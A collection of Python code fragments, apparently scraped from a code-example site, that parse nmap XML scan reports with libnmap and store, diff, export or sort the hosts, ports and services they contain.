    print_diff(newrep, oldrep)
Ejemplo n.º 46
    cursor = conn.cursor()
    debug("Start ",
          "Successfully connected to SQLite DB \"%s\"" % (args.scandb))
    cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
    if (u'hosts', ) not in cursor.fetchall():
        debug('Start ', 'Database does not exist. Creating...Done')
        try:
            cursor.executescript(sql_struct())
        except sqlite.ProgrammingError, msg:
            err("Start ", "%s: error: %s\n" % (argv[0], msg))
            sys.exit(1)
    else:
        debug('Start ', 'Database already exists. Continuing.')

    try:
        nmap_report = NmapParser.parse_fromfile(args.nmap_xml)
        debug("Parser", "Nmap Results: {0}".format(nmap_report.summary))
    except IOError:
        err("Parser",
            " %s: error: file \"%s\" doesn't exist" % (argv[0], args.nmap_xml))
        sys.exit(-1)
    except:
        err(
            "Parser", " %s: error: file \"%s\" Issue parsing Nmap XML" %
            (argv[0], args.nmap_xml))
        sys.exit(-1)

    for host in nmap_report.hosts:
        ip = host.address
        mac = host.mac
        if not host.ipv6:
Ejemplo n.º 47
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from libnmap.parser import NmapParser

def _changed_id(changed_items):
    """Pop one entry from a changed() result and return the text after its first '::'."""
    return changed_items.pop().split('::')[1]


# Load the two sample reports that are compared below.
rep1, rep2 = map(NmapParser.parse_fromfile,
                 ('libnmap/test/files/1_hosts.xml',
                  'libnmap/test/files/1_hosts_diff.xml'))

# Report level: pick one changed host and fetch it from both reports.
rep1_items_changed = rep1.diff(rep2).changed()
changed_host_id = _changed_id(rep1_items_changed)
changed_host1 = rep1.get_host_byid(changed_host_id)
changed_host2 = rep2.get_host_byid(changed_host_id)

# Host level: pick one changed service and fetch it from both hosts.
host1_items_changed = changed_host1.diff(changed_host2).changed()
changed_service_id = _changed_id(host1_items_changed)
changed_service1 = changed_host1.get_service_byid(changed_service_id)
changed_service2 = changed_host2.get_service_byid(changed_service_id)

# Service level: print every attribute that differs, with both values.
service1_items_changed = changed_service1.diff(changed_service2).changed()
for diff_attr in service1_items_changed:
    value_before = getattr(changed_service1, diff_attr)
    value_after = getattr(changed_service2, diff_attr)
    print("diff({0}, {1}) [{2}:{3}] [{4}:{5}]".format(
        changed_service1.id, changed_service2.id, diff_attr, value_before,
        diff_attr, value_after))
Ejemplo n.º 48
    nmapResults = sys.argv[1]

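# Output name: the text before the first "." of the input path, plus ".csv".
# NOTE(review): a path such as "./scan.xml" therefore yields ".csv"; pass a
# path without a leading "./" or derive the name from the base name instead.
csvFileName = sys.argv[1].split(".")[0] + ".csv"
print(csvFileName)

#Create a dictionary with CIDR and environment name as key:value pair
if len(sys.argv) > 2:
    with open(sys.argv[2]) as f:
        # Lines without a ":" (blank or malformed) are skipped; they used to
        # abort the run with a ValueError inside dict().
        targets = dict(x.rstrip().split(":", 1) for x in f if ":" in x)

#CSV file that we'll write to
# NOTE(review): the Banner column holds text returned by the scanned services.
# Spreadsheet applications may evaluate cells that start with =, +, - or @,
# so such values should be neutralised before they are written.
csvfile = open(csvFileName, 'w')
csvwriter = csv.writer(csvfile, dialect=csv.excel, quotechar='|', quoting=csv.QUOTE_MINIMAL)

#create variable to store parsed XML report in
nmap_report=NmapParser.parse_fromfile(nmapResults, data_type='XML')

#Write header row in CSV output
if len(sys.argv) > 2:
    csvwriter.writerow(['IPv4', 'Hostname', 'Subnet', 'Environment', 'Port', 'State', 'Protocol', 'Service', 'Reason', 'Banner'])
else:
    csvwriter.writerow(['IPv4', 'Hostname', 'Port', 'State', 'Protocol', 'Service', 'Reason', 'Banner'])

for scanned_host in nmap_report.hosts:
    # is_up is a method: without the call the bound method itself is tested,
    # which is always true, so hosts that are down were processed as well.
    if scanned_host.is_up():
        ipv4 = scanned_host.ipv4
        #ipv6 = scanned_host.ipv6
        if len(sys.argv) > 2:
            # Find the configured network that contains this address.
            for key in targets:
                if IPAddress(ipv4) in IPNetwork(key):
                    subnet = str(key)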
Ejemplo n.º 49
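	def parse(self, xml):
		"""Import an nmap XML report into the database.

		Every host in the report is either inserted or merged into its
		existing row, where only non-empty scan values overwrite stored ones.
		The same insert-or-merge is then done for each port of that host.

		xml -- path of the nmap XML output file.

		Hostnames, banners, script output and fingerprints stored here are
		text returned by the scanned hosts; whatever renders them later
		should treat them as untrusted input.
		"""

		report = NmapParser.parse_fromfile(xml)

		# Host attributes copied when the scanned value itself is non-empty.
		sized_attrs = ("ipv4", "ipv6", "mac", "status", "tcpsequence", "vendor")
		# Host attributes copied when their string form is non-empty.
		str_sized_attrs = ("uptime", "lastboot", "distance")

		for host in report.hosts:
			# OS class guess, OS match and first hostname are optional in a
			# report, so each lookup falls back to "". "except Exception"
			# keeps that best-effort behaviour without also swallowing
			# KeyboardInterrupt / SystemExit, as the bare "except:" did.
			try:
				accuracy = str(host.os_class_probabilities()[0])
			except Exception:
				accuracy = ""

			try:
				match = str(host.os_match_probabilities()[0])
			except Exception:
				match = ""

			try:
				hostname = host.hostnames[0]
			except Exception:
				hostname = ""

			if self.database.host_exist(host.address):
				# Known host: merge the new scan into the stored row.
				add_host = self.database.session.query(targets).filter( targets.address == host.address ).one()

				# Only overwrite script results whose string form is longer
				# than 3 characters (presumably to skip an empty container).
				if len(str(host.scripts_results)) > 3:
					add_host.scripts = str(host.scripts_results)
				if len(hostname) > 0:
					# Hostnames are kept as one space-separated string.
					# NOTE(review): this is a substring test, so a name that
					# is contained in an already stored name is not added.
					if hostname not in add_host.hostname:
						add_host.hostname = add_host.hostname + hostname + " "

				if len(match) > 0:
					add_host.os_match = match
				if len(accuracy) > 0:
					add_host.os_accuracy = accuracy
				for attr in sized_attrs:
					value = getattr(host, attr)
					if len(value) > 0:
						setattr(add_host, attr, value)
				for attr in str_sized_attrs:
					value = getattr(host, attr)
					if len(str(value)) > 0:
						setattr(add_host, attr, value)

			else:
				# New host: store everything the scan reported.
				add_host = targets(address=host.address,scripts=str(host.scripts_results), hostname=hostname, os_match=match, os_accuracy=accuracy, ipv4=host.ipv4, ipv6=host.ipv6, mac=host.mac, status=host.status, tcpsequence=host.tcpsequence, vendor=host.vendor, uptime=host.uptime, lastboot=host.lastboot, distance=host.distance)

			# Commit per host so add_host.id is available for the port rows.
			self.database.session.add(add_host)
			self.database.session.commit()

			for port in host.get_ports():
				number, protocol = port[0], port[1]
				service = host.get_service(number, protocol)

				if self.database.port_exist(add_host.id, number, protocol):
					# Known port: merge non-empty values into the stored row.
					add_port = self.database.session.query(services).filter( services.host_id == add_host.id, services.port == number, services.protocol == protocol ).one()

					if len(service.service) > 0:
						add_port.service = service.service
					if len(service.servicefp) > 0:
						add_port.fingerprint = str(service.servicefp)

					if len(service.state) > 0:
						add_port.state = service.state
					if len(service.banner) > 0:
						# Drop the "label: " prefixes from the banner text.
						# The class was [A-z], which also spans the
						# punctuation between "Z" and "a" ([ \ ] ^ _ `).
						add_port.banner = re.sub(r'[A-Za-z]+?:\s', '', service.banner)

				else:
					# New port.
					# NOTE(review): unlike the merge path above, banner and
					# fingerprint are stored unmodified here - confirm which
					# form the readers of this table expect.
					add_port = services(port=number, protocol=protocol, service=service.service, fingerprint=service.servicefp, state=service.state, banner=service.banner, host = add_host)

				self.database.session.add(add_port)

		# Port rows of all hosts are committed together at the end.
		self.database.session.commit()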
Ejemplo n.º 50
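args = parser.parse_args()

ptdb = PenTestDBConn()
# The directory is passed base64-encoded on the command line. b64decode
# returns bytes, so os.listdir() below yields bytes file names.
path = base64.b64decode(args.path)
try:
    files = os.listdir(path)
except FileNotFoundError:
    print('Path does not exist: {0}'.format(path))
    # Stop here: continuing would fail on os.chdir() and on the undefined
    # "files" name instead of on the real cause.
    raise SystemExit(1)

# Report file names are opened relative to this directory from here on.
os.chdir(path)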

for file in files:
    if file.decode('utf-8') == 'archive':
        continue

    nmap_report = NmapParser.parse_fromfile(file.decode('utf-8'))

    for scanned_host in nmap_report.hosts:
        address = scanned_host.address  # ip address
        mac = scanned_host.mac  # mac address
        if scanned_host.os_fingerprinted:
            host_os = scanned_host.os.osmatches[0].name
        else:
            host_os = None

        # TODO: check if host already exists and we just need to update it
        host_id = ptdb.insert_host_record(address, mac, host_os)

        ports = scanned_host.get_ports()
        for port in ports:
            port_num = port[0]
Ejemplo n.º 51

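if __name__ == "__main__":
    # Command-line entry point: parse every nmap XML report given on the
    # command line and hand them, with the output workbook, to main().
    import argparse
    import sys

    parser = argparse.ArgumentParser()
    parser.add_argument("-o",
                        "--output",
                        metavar="XLS",
                        help="path to xlsx output")
    parser.add_argument("reports",
                        metavar="XML",
                        nargs="+",
                        help="path to nmap xml report")
    args = parser.parse_args()

    if args.output is None:
        parser.error("Output must be specified")

    reports = []
    for report in args.reports:
        try:
            parsed = NmapParser.parse_fromfile(report)
        except NmapParserException:
            # Retry in incomplete mode, which accepts an interrupted scan.
            # Say so: the resulting sheet may be missing hosts or ports, and
            # a silent fallback would make it look like full coverage.
            sys.stderr.write(
                "warning: %s is not a complete nmap report; "
                "parsed with incomplete=True, results may be partial\n" %
                report)
            parsed = NmapParser.parse_fromfile(report, incomplete=True)

        # Remember which file each report came from.
        parsed.basename = os.path.basename(report)
        reports.append(parsed)

    workbook = Workbook(args.output)
    main(reports, workbook)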
Ejemplo n.º 52
from libnmap.parser import NmapParser
from libnmap.reportjson import ReportDecoder, ReportEncoder
import json

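# Round-trip an NmapReport through JSON using libnmap's encoder and decoder.
nmap_report_obj = NmapParser.parse_fromfile('/root/dev/python-nmap-lib/libnmap/test/files/1_hosts.xml')

# create a json object from an NmapReport instance
nmap_report_json = json.dumps(nmap_report_obj, cls=ReportEncoder)
# print() with one argument runs on both Python 2 and 3; the bare print
# statement used before is a syntax error on Python 3.
print(nmap_report_json)
# create a NmapReport instance from a json object
nmap_report_obj = json.loads(nmap_report_json, cls=ReportDecoder)
print(nmap_report_obj)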

Ejemplo n.º 53
 def test_osclasses_new(self):
     """Compare parsed OS classes of the 'nv6' fixture with a fixed table.

     Two hosts are popped off the end of the parsed host list and each
     osclass of each osmatch is checked against expected[host][match][class].
     Only entries present in the parsed report are compared, so a missing
     osmatch or osclass would not make this test fail.
     """
     def osclass(kind, vendor, family, gen):
         # Every expected entry carries accuracy 100.
         return {
             'type': kind,
             'accuracy': 100,
             'vendor': vendor,
             'osfamily': family,
             'osgen': gen
         }

     def windows(gen, kind='general purpose'):
         return osclass(kind, 'Microsoft', 'Windows', gen)

     # expected[host index][osmatch index][osclass index]
     expected = [
         [
             [
                 osclass('general purpose', 'Apple', 'Mac OS X', '10.8.X'),
                 osclass('phone', 'Apple', 'iOS', '5.X'),
                 osclass('media device', 'Apple', 'iOS', '5.X'),
             ],
         ],
         [
             [windows('2008')],
             [windows('7')],
             [windows('Phone', kind='phone')],
             [windows('Vista'), windows('2008'), windows('7')],
             [windows('Vista'), windows('7'), windows('2008')],
         ],
     ]

     report = NmapParser.parse_fromfile(self.flist_os['nv6']['file'])
     # Last host first: pop() takes from the end of the list.
     popped_hosts = [report.hosts.pop(), report.hosts.pop()]

     for host_idx, host in enumerate(popped_hosts):
         for match_idx, osmatch in enumerate(host.os.osmatches):
             for class_idx, parsed in enumerate(osmatch.osclasses):
                 actual = {
                     'type': parsed.type,
                     'accuracy': parsed.accuracy,
                     'vendor': parsed.vendor,
                     'osfamily': parsed.osfamily,
                     'osgen': parsed.osgen
                 }
                 self.assertEqual(
                     expected[host_idx][match_idx][class_idx], actual)
Ejemplo n.º 54
    def allOpenPorts(self):
        """Load the full-TCP nmap XML report for self.target and sort its open
        services into the per-protocol lists held on the instance.

        The report path is looked up as ("nmap", "nmap_full_tcp_xml") through
        config_parser.CommandParser; if that file does not exist the method does
        nothing. Any exception raised while parsing or classifying is printed and
        the method returns, leaving whatever was appended so far in place.

        Classification is by substring match on the service name, tunnel, banner
        and product strings of each service. Banner, product and script output are
        text returned by the probed services and are stored unmodified."""
        def parsefile(xmlfile):
            # Runs the file through a parser with a no-op ContentHandler before
            # libnmap reads it; a file that is not well-formed raises here.
            # make_parser / ContentHandler are presumably xml.sax's - the imports
            # are not visible in this excerpt.
            parser = make_parser()
            parser.setContentHandler(ContentHandler())
            parser.parse(xmlfile)

        c = config_parser.CommandParser(
            f"{os.path.expanduser('~')}/.config/autorecon/config.yaml",
            self.target)
        if os.path.exists(c.getPath("nmap", "nmap_full_tcp_xml")):
            try:
                parsefile(c.getPath("nmap", "nmap_full_tcp_xml"))
                report = NmapParser.parse_fromfile(
                    c.getPath("nmap", "nmap_full_tcp_xml"))
                # Only the first host of the report is used. The services are
                # added to what self.nmap_services already holds, then the whole
                # list is re-sorted by port.
                self.nmap_services += report.hosts[0].services
                self.nmap_services = sorted(self.nmap_services,
                                            key=lambda s: s.port)
                # print(self.nmap_services)
                # Ports that the plain-HTTP rule below never adds to http_ports.
                # The BaseHTTPServer and Apache rules do not apply this list.
                ignored_windows_http_ports = [593, 5985, 47001, 49669, 49670]
                for service in self.nmap_services:
                    # Keep states that contain "open" but not "open|filtered".
                    if "open" not in service.state:
                        continue
                    if "open|filtered" in service.state:
                        continue
                    # Tuple layout used by the index lookups below:
                    # 0 port, 1 service name, 2 tunnel, 3 cpelist, 4 banner,
                    # 5 product, 6 version, 7 extrainfo, 8 scripts_results.
                    self.services.append((
                        service.port,
                        service.service,
                        service.tunnel,
                        service.cpelist,
                        service.banner,
                        service.service_dict.get("product", ""),
                        service.service_dict.get("version", ""),
                        service.service_dict.get("extrainfo", ""),
                        service.scripts_results,
                    ))
                    # NOTE(review): this loop is nested inside the outer one and
                    # reuses the name "service"; it walks all of self.services
                    # again after every append. The "not in" guards keep the
                    # lists free of duplicates, but the work grows quadratically.
                    # Confirm whether it was meant to run once, after the outer
                    # loop.
                    for service in self.services:
                        if service[0] not in self.tcp_ports:
                            self.tcp_ports.append(service[0])
                        # TLS-wrapped services, except imap, pop3 and ldap.
                        if "ssl" in service[2] or ("ssl" in service[1]):
                            if "imap" not in service[1]:
                                if "pop3" not in service[1]:
                                    if "ldap" not in service[1]:
                                        if service[0] not in self.ssl_ports:
                                            self.ssl_ports.append(service[0])
                                        if service[
                                                8] not in self.ssl_script_results:
                                            self.ssl_script_results.append(
                                                service[8])
                        # Plain HTTP: an "http" service name with no ssl marker
                        # in name or tunnel, not MiniServ, not http-proxy, and
                        # not one of the ignored ports.
                        if "http" in service[1] and (
                                "ssl/http" not in service[1]) and (
                                    "ssl"
                                    not in service[2]) and ("ssl"
                                                            not in service[1]):
                            if "MiniServ" not in service[5]:
                                if "http-proxy" not in service[1]:
                                    if service[
                                            0] not in ignored_windows_http_ports:
                                        if service[0] not in self.http_ports:
                                            self.http_ports.append(service[0])
                                        if service[
                                                8] not in self.http_script_results:
                                            self.http_script_results.append(
                                                service[8])
                        # netbios-ssn and microsoft-ds both land in smb_ports.
                        if "netbios-ssn" in service[1]:
                            if service[0] not in self.smb_ports:
                                self.smb_ports.append(service[0])
                        if "microsoft-ds" in service[1]:
                            if service[0] not in self.smb_ports:
                                self.smb_ports.append(service[0])
                        if "domain" in service[1]:
                            if service[0] not in self.dns_ports:
                                self.dns_ports.append(service[0])
                        if "http-proxy" in service[1]:
                            if service[0] not in self.proxy_ports:
                                self.proxy_ports.append(service[0])
                        if "ssh" in service[1]:
                            if service[0] not in self.ssh_ports:
                                self.ssh_ports.append(service[0])
                            if service[5] not in self.ssh_product:
                                self.ssh_product.append(service[5])
                            if service[6] not in self.ssh_version:
                                self.ssh_version.append(service[6])
                            if service[8] not in self.ssh_script_results:
                                self.ssh_script_results.append(service[8])
                        # Port 49160 is left out of oracle_tns_ports; the reason
                        # is not visible here.
                        if "oracle-tns" in service[1]:
                            if service[0] != 49160:
                                if service[0] not in self.oracle_tns_ports:
                                    self.oracle_tns_ports.append(service[0])
                        if "ftp" in service[1]:
                            if service[0] not in self.ftp_ports:
                                self.ftp_ports.append(service[0])
                            if service[5] not in self.ftp_product:
                                self.ftp_product.append(service[5])
                            if service[6] not in self.ftp_version:
                                self.ftp_version.append(service[6])
                        # For smtp the banner (index 4) is what goes into
                        # smtp_version.
                        if "smtp" in service[1]:
                            if service[0] not in self.smtp_ports:
                                self.smtp_ports.append(service[0])
                            if service[4] not in self.smtp_version:
                                self.smtp_version.append(service[4])
                            if service[5] not in self.smtp_product:
                                self.smtp_product.append(service[5])
                        # rpcbind ports are recorded in nfs_ports.
                        if "rpcbind" in service[1]:
                            if service[0] not in self.nfs_ports:
                                self.nfs_ports.append(service[0])
                        if "msrpc" in service[1]:
                            if service[0] not in self.rpc_ports:
                                self.rpc_ports.append(service[0])
                        if "ldap" in service[1]:
                            if service[0] not in self.ldap_ports:
                                self.ldap_ports.append(service[0])
                        # Banner or product based HTTP detection, for services
                        # whose name did not match the plain-HTTP rule.
                        if "BaseHTTPServer" in service[4]:
                            if service[0] not in self.http_ports:
                                self.http_ports.append(service[0])
                        if "Apache" in service[5] and (
                                "ssl/http" not in service[1]) and (
                                    "ssl"
                                    not in service[2]) and ("ssl"
                                                            not in service[1]):
                            if service[0] not in self.http_ports:
                                self.http_ports.append(service[0])
                        if "telnet" in service[1]:
                            if service[0] not in self.telnet_ports:
                                self.telnet_ports.append(service[0])
                        # asterisk ports are recorded in sip_ports.
                        if "asterisk" in service[1]:
                            if service[0] not in self.sip_ports:
                                self.sip_ports.append(service[0])
                        if "vnc" in service[1]:
                            if service[0] not in self.vnc_ports:
                                self.vnc_ports.append(service[0])
                        if "cassandra" in service[1]:
                            if service[0] not in self.cassandra_ports:
                                self.cassandra_ports.append(service[0])
                        if "ms-sql" in service[1]:
                            if service[0] not in self.mssql_ports:
                                self.mssql_ports.append(service[0])
                        if "mysql" in service[1]:
                            if service[0] not in self.mysql_ports:
                                self.mysql_ports.append(service[0])
                        if "finger" in service[1]:
                            if service[0] not in self.finger_ports:
                                self.finger_ports.append(service[0])
                        if "mongod" in service[1]:
                            if service[0] not in self.mongo_ports:
                                self.mongo_ports.append(service[0])
                        if "pop3" in service[1]:
                            if service[0] not in self.pop3_ports:
                                self.pop3_ports.append(service[0])
                        # kerberos and kpasswd both land in kerberos_ports.
                        if "kerberos" in service[1]:
                            if service[0] not in self.kerberos_ports:
                                self.kerberos_ports.append(service[0])
                        if "kpasswd" in service[1]:
                            if service[0] not in self.kerberos_ports:
                                self.kerberos_ports.append(service[0])
                        if service[4] not in self.banners:
                            self.banners.append(service[4])
                        if service[5] not in self.all_products:
                            self.all_products.append(service[5])

                # Only the script results of the first recorded HTTP service are
                # searched for a title. "in result" is tuple membership, so it
                # matches when the script id (or its output) equals "http-title".
                if len(self.http_script_results) != 0:
                    for t in self.http_script_results[0]:
                        result = t["id"], t["output"]
                        if "http-title" in result:
                            if result[1] not in self.http_script_title:
                                self.http_script_title.append(result[1])
            except Exception as e:
                # Best effort: report the failure and stop. Lists filled before
                # the error keep their partial content.
                print(
                    f"""{c.getPath("nmap", "nmap_full_tcp_xml")} Cannot Parse Full TCP nmap xml file. {e}"""
                )
                return
Ejemplo n.º 55
    def test_osmatches_new(self):
        """Compare parsed OS matches of the 'nv6' fixture with a fixed table.

        Two hosts are popped off the end of the parsed host list and each
        osmatch is checked against expected[host][match]. Only osmatches
        present in the parsed report are compared, so a missing one would
        not make this test fail.
        """
        def osmatch(line, name):
            # Every expected entry carries accuracy 100.
            return {"line": line, "accuracy": 100, "name": name}

        # expected[host index][osmatch index]
        expected = [
            [
                osmatch(
                    6014,
                    "Apple Mac OS X 10.8 - 10.8.1 (Mountain Lion) (Darwin 12.0.0 - 12.1.0) or iOS 5.0.1",
                ),
            ],
            [
                osmatch(52037, "Microsoft Windows Server 2008 Beta 3"),
                osmatch(52938, "Microsoft Windows 7 Professional"),
                osmatch(54362, "Microsoft Windows Phone 7.5"),
                osmatch(
                    54897,
                    "Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7",
                ),
                osmatch(
                    55210,
                    "Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008",
                ),
            ],
        ]

        report = NmapParser.parse_fromfile(self.flist_os["nv6"]["file"])
        # Last host first: pop() takes from the end of the list.
        popped_hosts = [report.hosts.pop(), report.hosts.pop()]

        for host_idx, host in enumerate(popped_hosts):
            for match_idx, parsed in enumerate(host.os.osmatches):
                actual = {
                    "line": parsed.line,
                    "accuracy": parsed.accuracy,
                    "name": parsed.name,
                }
                self.assertEqual(expected[host_idx][match_idx], actual)
Ejemplo n.º 56
    def openProxyPorts(self):
        """Load the proxychains nmap XML report for self.target and sort its open
        services into the proxy_* lists held on the instance.

        The report path is looked up as ("nmap", "nmap_proxychain_top_ports")
        through config_parser.CommandParser; if that file does not exist the
        method does nothing. Any exception raised while parsing or classifying is
        printed and the method returns, leaving whatever was appended so far in
        place.

        Classification is by substring match on the service name, tunnel and
        banner strings. Banners are text returned by the probed services and are
        stored unmodified."""
        def parsefile(xmlfile):
            # Runs the file through a parser with a no-op ContentHandler before
            # libnmap reads it; a file that is not well-formed raises here.
            # make_parser / ContentHandler are presumably xml.sax's - the imports
            # are not visible in this excerpt.
            parser = make_parser()
            parser.setContentHandler(ContentHandler())
            parser.parse(xmlfile)

        c = config_parser.CommandParser(
            f"{os.path.expanduser('~')}/.config/autorecon/config.yaml",
            self.target)
        if os.path.exists(c.getPath("nmap", "nmap_proxychain_top_ports")):
            try:
                parsefile(c.getPath("nmap", "nmap_proxychain_top_ports"))
                proxy_report = NmapParser.parse_fromfile(
                    c.getPath("nmap", "nmap_proxychain_top_ports"))
                # Only the first host of the report is used. The services are
                # added to what self.proxy_nmap_services already holds, then the
                # whole list is re-sorted by port.
                self.proxy_nmap_services += proxy_report.hosts[0].services
                self.proxy_nmap_services = sorted(self.proxy_nmap_services,
                                                  key=lambda s: s.port)
                # Ports that the plain-HTTP rule below never adds to
                # proxy_http_ports. The BaseHTTPServer rule does not apply it.
                ignored_windows_http_ports = [593, 5985, 47001, 49669, 49670]
                for service in self.proxy_nmap_services:
                    # Any state containing "open" is kept, so "open|filtered"
                    # passes here - allOpenPorts skips that state.
                    if "open" not in service.state:
                        continue
                    # Tuple layout used by the index lookups below:
                    # 0 port, 1 service name, 2 tunnel, 3 cpelist, 4 banner.
                    self.proxy_services.append((
                        service.port,
                        service.service,
                        service.tunnel,
                        service.cpelist,
                        service.banner,
                    ))
                    # NOTE(review): this loop is nested inside the outer one and
                    # reuses the name "service"; it walks all of
                    # self.proxy_services again after every append. The "not in"
                    # guards keep the lists free of duplicates, but the work
                    # grows quadratically. Confirm whether it was meant to run
                    # once, after the outer loop.
                    for service in self.proxy_services:
                        if service[0] not in self.proxy_tcp_ports:
                            self.proxy_tcp_ports.append(service[0])
                        # TLS-wrapped services, except imap, pop3 and ldap.
                        if "ssl" in service[2] or ("ssl" in service[1]):
                            if "imap" not in service[1]:
                                if "pop3" not in service[1]:
                                    if "ldap" not in service[1]:
                                        if service[
                                                0] not in self.proxy_ssl_ports:
                                            self.proxy_ssl_ports.append(
                                                service[0])
                        # Plain HTTP: an "http" service name with no ssl marker
                        # in name or tunnel, not http-proxy, and not one of the
                        # ignored ports.
                        if "http" in service[1]:
                            if "ssl" not in service[2]:
                                if "ssl" not in service[1]:
                                    if "http-proxy" not in service[1]:
                                        if service[
                                                0] not in ignored_windows_http_ports:
                                            if service[
                                                    0] not in self.proxy_http_ports:
                                                self.proxy_http_ports.append(
                                                    service[0])
                        # netbios-ssn and microsoft-ds both land in
                        # proxy_smb_ports.
                        if "netbios-ssn" in service[1]:
                            if service[0] not in self.proxy_smb_ports:
                                self.proxy_smb_ports.append(service[0])
                        if "microsoft-ds" in service[1]:
                            if service[0] not in self.proxy_smb_ports:
                                self.proxy_smb_ports.append(service[0])
                        if "domain" in service[1]:
                            if service[0] not in self.proxy_dns_ports:
                                self.proxy_dns_ports.append(service[0])
                        if "http-proxy" in service[1]:
                            if service[0] not in self.proxy_ports2:
                                self.proxy_ports2.append(service[0])
                        # For ssh the banner (index 4) is what goes into
                        # proxy_ssh_version.
                        if "ssh" in service[1]:
                            if service[0] not in self.proxy_ssh_ports:
                                self.proxy_ssh_ports.append(service[0])
                            if service[4] not in self.proxy_ssh_version:
                                self.proxy_ssh_version.append(service[4])
                        # Port 49160 is left out of proxy_oracle_tns_ports; the
                        # reason is not visible here.
                        if "oracle-tns" in service[1]:
                            if service[0] != 49160:
                                if service[
                                        0] not in self.proxy_oracle_tns_ports:
                                    self.proxy_oracle_tns_ports.append(
                                        service[0])
                        if "ftp" in service[1]:
                            if service[0] not in self.proxy_ftp_ports:
                                self.proxy_ftp_ports.append(service[0])
                        if "smtp" in service[1]:
                            if service[0] not in self.proxy_smtp_ports:
                                self.proxy_smtp_ports.append(service[0])
                        # rpcbind ports are recorded in proxy_nfs_ports.
                        if "rpcbind" in service[1]:
                            if service[0] not in self.proxy_nfs_ports:
                                self.proxy_nfs_ports.append(service[0])
                        if "msrpc" in service[1]:
                            if service[0] not in self.proxy_rpc_ports:
                                self.proxy_rpc_ports.append(service[0])
                        if "ldap" in service[1]:
                            if service[0] not in self.proxy_ldap_ports:
                                self.proxy_ldap_ports.append(service[0])
                        # Banner based HTTP detection, for services whose name
                        # did not match the plain-HTTP rule.
                        if "BaseHTTPServer" in service[4]:
                            if service[0] not in self.proxy_http_ports:
                                self.proxy_http_ports.append(service[0])

                # print("HTTP PORTS:", self.proxy_http_ports)
                # print("ORACLE PORTS:", self.proxy_oracle_tns_ports)
                # print("OPEN TCP PORTS:", self.proxy_tcp_ports)
                # print("SSL:", self.proxy_ssl_ports)
                # print("SMB:", self.proxy_smb_ports)
                # print("DNS:", self.proxy_dns_ports)
                # print("Services:", self.proxy_services)
                # print("SSH:", self.proxy_ssh_ports)
                # print("SSH VERSION:", self.proxy_ssh_version)
                # print("Proxy Ports2:", self.proxy_ports2)
            except Exception as e:
                # Best effort: report the failure and stop. Lists filled before
                # the error keep their partial content.
                print(
                    f"""{c.getPath("nmap", "nmap_proxychain_top_ports")} Cannot Parse proxychain top ports nmap xml file. {e}"""
                )
                return
Ejemplo n.º 57
        help="print the output in list format; easy for copy/paste")
    parser.add_argument(
        "-ps",
        "--status",
        help=
        "specify the state of the port. Options are open, closed, filtered, unfiltered, \"open|filtered\", \"closed|filtered\"; by default only ports with open state are filtered "
    )
    parser.add_argument("--export",
                        help="export the filtered output to a csv file.")
    parser.add_argument("-v",
                        "--verbose",
                        action='store_true',
                        help="Give more detailed information!!")

    args = parser.parse_args()
    nmap_report = NmapParser.parse_fromfile(args.file[0])
    '''Fetch All Hosts from the Nmap File'''
    hosts = nmap_report.hosts
    '''Fetch NmapHost object with Status up and status down. Need to print the alive hosts too??'''
    hosts_up, hosts_down, live_ip, dead_ip = get_up_down_hosts(hosts)
    '''Parsing IPs; Get alive IPs if IP addresses not specified'''
    if not args.ip and not args.service and not args.tcp and not args.udp and not args.status and not args.nmap and not args.list and not args.export:
        print_default(live_ip, dead_ip, hosts_up, hosts_down, args.verbose)
        exit()

    ips_up = []
    ips_excluded = []
    if args.exclude_ip:
        excluded_ip = parse_ip(args.exclude_ip)
        for excluded_ip in excluded_ip:
            for exclude_ip in live_ip:
Ejemplo n.º 58
    def openPorts(self):
        """The openPorts function will parse all found ports from the nmap.xml file fed to
        the report variable. All ports will be appended to the lists in __init__ and will
        then be accessible from the NmapParserFunk Class."""
        def parsefile(xmlfile):
            parser = make_parser()
            parser.setContentHandler(ContentHandler())
            parser.parse(xmlfile)

        c = config_parser.CommandParser(
            f"{os.path.expanduser('~')}/.config/autorecon/config.yaml",
            self.target)
        if os.path.exists(c.getPath("nmap", "nmap_top_ports_xml")):
            try:
                parsefile(c.getPath("nmap", "nmap_top_ports_xml"))
                report = NmapParser.parse_fromfile(
                    c.getPath("nmap", "nmap_top_ports_xml"))
                self.nmap_services += report.hosts[0].services
                self.nmap_services = sorted(self.nmap_services,
                                            key=lambda s: s.port)
                self.osversions += report.hosts[0].os_match_probabilities()
                if self.osversions:
                    self.osversion[self.target] = {
                        "name": self.osversions[0].name,
                        "accuracy": self.osversions[0].accuracy
                    }
                    # print(json.dumps(self.osversion))
                    try:
                        for k, v in self.osversion.items():
                            # print(f"Key: {k} \n Value: {v}")
                            self.os_system.append(v.get('name'))
                    except KeyError as ke_err:
                        print(f"Key Error: {ke_err}")
                    except ValueError as ve_err:
                        print(f"Value Error: {ve_err}")
                    # print(self.os_system)
                    if self.os_system:
                        self.os_system = self.os_system[0].split()
                        # print(self.os_system)
                        windows = ['Microsoft', 'Windows']
                        if not any(s in windows for s in self.os_system):
                            self.os_system_type.append("Linux")
                        else:
                            self.os_system_type.append("Windows")
                        # print(self.os_system_type)

                # print(self.nmap_services)
                ignored_windows_http_ports = [593, 5985, 47001, 49669, 49670]
                for service in self.nmap_services:
                    if "open" not in service.state:
                        continue
                    if "open|filtered" in service.state:
                        continue
                    self.services.append((
                        service.port,
                        service.service,
                        service.tunnel,
                        service.cpelist,
                        service.banner,
                        service.service_dict.get("product", ""),
                        service.service_dict.get("version", ""),
                        service.service_dict.get("extrainfo", ""),
                        service.scripts_results,
                    ))
                    for service in self.services:
                        if service[0] not in self.tcp_ports:
                            self.tcp_ports.append(service[0])
                        if "ssl" in service[2] or ("ssl" in service[1]):
                            if "imap" not in service[1]:
                                if "pop3" not in service[1]:
                                    if "ldap" not in service[1]:
                                        if service[0] not in self.ssl_ports:
                                            self.ssl_ports.append(service[0])
                                        if service[
                                                8] not in self.ssl_script_results:
                                            self.ssl_script_results.append(
                                                service[8])
                        if "http" in service[1] and (
                                "ssl/http" not in service[1]) and (
                                    "ssl"
                                    not in service[2]) and ("ssl"
                                                            not in service[1]):
                            if "MiniServ" not in service[5]:
                                if "http-proxy" not in service[1]:
                                    if service[
                                            0] not in ignored_windows_http_ports:
                                        if service[0] not in self.http_ports:
                                            self.http_ports.append(service[0])
                                        if service[
